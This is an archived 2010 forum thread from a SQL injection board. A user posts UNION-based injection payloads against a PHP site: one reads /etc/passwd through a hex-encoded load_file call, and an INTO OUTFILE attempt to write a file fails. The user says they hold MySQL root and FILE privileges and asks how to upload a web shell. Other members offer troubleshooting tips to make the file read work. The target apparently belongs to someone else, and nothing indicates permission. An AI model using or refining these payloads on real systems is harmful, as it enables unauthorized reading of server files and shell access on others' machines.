|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
INTO OUTFILE Problem |
|
Posted: Sat May 01, 2010 5:49 pm |
|
|
delta |
Advanced user |
|
|
Joined: Jan 11, 2009 |
Posts: 60 |
|
|
|
|
|
|
|
Ok, I have FILE privileges, can read /etc/passwd, etc with load_file, but when INTO OUTFILE is used the file isn't created, already tried to create the file in /tmp dir but not working. Magic Quotes = off, or it seems to be...
Working:
Code: | .php?m=-1 UNION select null,load_file(0x2f6574632f706173737764),null,null,null,null,null,null,null,null,null,null,null FROM mysql.user--+ |
Not Working:
Code: | .php?m=-1 UNION select null,'test',null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE '/tmp/test.txt'--+ |
Output:
Code: | Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /... on line 28 |
I have access to the mysql root too.
Any idea on how can I upload a shell? |
|
|
|
|
|
|
|
|
Posted: Sat May 01, 2010 6:14 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
First make sure that you don't have "magic_quotes" problem. For this try to read files via "load_file" using single quoted strings, not hex-encoded. |
|
|
|
|
Posted: Sat May 01, 2010 6:30 pm |
|
|
VERTIGO |
Advanced user |
|
|
Joined: Sep 25, 2008 |
Posts: 87 |
|
|
|
|
|
|
|
Code: | First make sure that you don't have "magic_quotes" problem. For this try to read files via "load_file" using single quoted strings, not hex-encoded. |
These i dont know,waraxe its not bad to write some tutorials,you have exselent knoweledge in sql inj |
|
|
|
|
Posted: Sun May 02, 2010 7:19 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
VERTIGO wrote: | Code: | First make sure that you don't have "magic_quotes" problem. For this try to read files via "load_file" using single quoted strings, not hex-encoded. |
These i dont know,waraxe its not bad to write some tutorials,you have exselent knoweledge in sql inj |
load_file('/etc/hosts') |
|
|
|
|
Posted: Sun May 02, 2010 8:44 pm |
|
|
delta |
Advanced user |
|
|
Joined: Jan 11, 2009 |
Posts: 60 |
|
|
|
|
|
|
|
If I do load_file('/etc/passwd') it won't work too, already tried, but pangolin says that magic_quotes = OFF, so that's not true then?
Any other way I can upload the shell? |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|